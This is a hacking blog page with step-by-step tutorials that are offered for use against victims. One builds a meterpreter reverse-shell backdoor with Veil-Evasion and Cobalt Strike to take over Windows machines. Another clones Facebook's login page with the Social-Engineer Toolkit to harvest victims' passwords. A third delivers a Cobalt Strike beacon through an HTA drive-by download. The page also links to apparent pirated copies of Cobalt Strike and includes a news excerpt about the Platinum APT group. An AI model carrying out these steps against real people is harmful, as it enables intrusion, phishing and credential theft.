Hack Windows Using Public IP Cobaltstrike

Introduction About Cobaltstrike

CobaltStrike Emulation Tools is a collection of threats that work with Metasploit Framework. CobaltStrike to help you get a foothold in the network and secretly keep working. Tools post-exploitation CobaltStrike helps you show what you can do with the powerful tools of CobaltStrike.
CobaltStrike also produce professional reports at the end of your attack.
Many features of CobaltStrike that can work as a standalone tool with the workings of the Metasploit Framework CobaltStrike together, you will benefit from the smooth use of all the capabilities of the CobaltStrike together. As a bonus, CobaltStrike is a tool that is included in the GUI and along its Armitage. If you often use Armitage, and when you try CobaltStrike tools you will find differences with the use of Armitage.


Download Free Cobaltstrike Zippyshare
Download Free Cobaltstrike 4Shared

Download Free Cobaltstrike Google Drive

And now i will show you about hacking windows using Veil-Framework and Cobaltstrike. This method uses a backdoor created in Veil-Evasion using bat format.
Open Veil-Evasion

Show list available payload

Use powershell/meterpreter/rev_https

Use 23

Open your browser, and check your public Ip

Set LHOST <your public ip>

Set LPORT <4321>

Info

Generate

check payload.bat on your directory

Open cobaltstrike

Connect

Yes

Let Proccess running

Select Cobaltstrike > Listeners

Set Name : payload, Payload : windows/meterpreter/rev_https, Host : Your public Ip,  Port : 4321. save

Debug

Open payload.bat on victim machine

Meterpreter Session 1 opened

You succes on victim system. Check run VNC


Check Browser Files


Getsystem
Download Cobaltstrike full version.


Related Posts:

Platinum Hackers Hijack Windows Hotpatching To Stay Hidden


http://learninghacker16.blogspot.co.id/2016/04/platinum-hackers-hijack-windows.html




"If the tool fails to inject code using hot patching, it reverts to attempting the other more common code injection techniques into common Windows processes, primarily targeting winlogon.exe, lsass.exe, and svchost.exe," Microsoft said in its report.

The hotpatching technique works against Windows Server 2003 Service Pack 1, Windows Server 2008, Windows Server 2008 R2, Windows Vista, and Windows 7. Platinum abused the technique in real-world attacks to hide its efforts from analysis.

The group has been using the Hotpatching technique to install the Dipsing, Adbupd and JPIN backdoors on networks belonging to governmental organizations, including defense organizations, intelligence agencies, diplomats and Internet Service Providers (ISPs) and then to steal sensitive data.

The goal of the attacks doesn’t appear to have been immediate financial gain; rather the Platinum APT group is up to a broader economic espionage campaign using stolen information.

The group has been targeting countries in South and Southeast Asia since at least 2009, with Malaysia being its biggest victim, following Indonesia, China, and India.
Though the Platinum group is still active, there is still a way for organizations and companies to avoid infection.

Microsoft's security experts explain that the hotpatching technique requires admin-level permissions, so the threat actors are sending spear-phishing emails that come with boobytrapped Office documents to infect each target.





 

Related Posts:

Social Engineering Toolkit Using Public IP Clone

Introduction Social Engineering toolkit

Copyright 2016 The Social-Engineer Toolkit (SET)
Written by: David Kennedy (ReL1K)
Company: TrustedSec
DISCLAIMER: This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.
Please read the LICENSE under readme/LICENSE for the licensing of SET.

Features

The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC – an information security consulting firm located in Cleveland, Ohio.

Bugs and enhancements

For bug reports or enhancements, please open an issue here: https://github.com/trustedsec/social-engineer-toolkit/issues

Supported platforms

  • Linux
  • Mac OS X 

And now i will open discussion about using Social Engineering Toolkit with Public Ip Clone

Open Social Engineering Toolkit

press 1 (Social-Engineering Attack)

press 2 (Website Attack Vector)

press 3 (Credential Harvester Attack Method)

press 2 (Site Cloner)

Open your browser and open http://www.whatsmyip.org/ (Look you Public Ip)

Write your public ip on Harvester/Tabnabbing

In Enter  the url to clone :  www.facebook.com

You can look at /var/www/html to see the records from the result S.E.T. with name harvester

If someone opens your ip on the browser, though different ip. it will open the login page facebook


Write user and password

www.facebook.com

And you can open file harvester on your directory /var/www/html
You can found email and password victim

And congratulations. You get a user and password facebook.
If you have full access for your public ip, You can setting on your router for setting open port 80. And i can show you how setting port fordwarding on mikrotik.
open your router, select ip > firewall 

NAT

Press button +. chain : dstnat. dst_address : your public ip. protocol : 6(tcp). dst_port : 80


In Action Nat. Action : dst-nat. to address : your local ip. to ports : 80

Related Posts:

HTML Attack Using Cobaltstrike

Introduction Cobaltstrike

Cobalt-Strike relies on the Metasploit Framework. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Cobalt-Strike is a collection of threat emulation tools provided by Strategic Cyber LLC to work with the Metasploit Framework. Cobalt-Strike includes all features of Armitage and add post-exploitation tools, in addition to report generation features

Download  Cobaltstrike Full Version Google Drive
Download  Cobaltstrike Full Version Zippyshare
Download  Cobaltstrike Full Version 4Shared

In this tutorial i will show you about  HTML Attack Using Cobaltstrike.
Open Cobaltstrike

Connect

Yes

Waiting Open cobaltstrike

Attack > Packages > Windows Executable

Prees add. Set Name : beacon.html, Payload : windows/beacon_http/reverse_http, Host : your local ip, Port :4433. Save

Enter your local Ip

Generate

Select to your desktop, set file name : tes1.exe. save

OK

Attack > Packages > HTML-Application

Select tes1.exe on desktop. Then press open

Launch

Select to desktop, set file name : tes1.hta. save

OK

Select Attack > Web Drive-by > Host file

Select desktop, and select tes1.hta. Then Open

set File : root/Desktop/tes1.hta, url path : /tes1.hta, Local Port :4433, Mime type : automatic. then Launch

You can look a url, and if victim open a url, then you can access to victim. copy the url.

Open  mozilla on victim, and paste the url.

Save File

Run

View > beacons

Interact

Message

And create a message for a victim.

You have type help to beacon for show all a tools hacking
pwd

getsystem


Related Posts: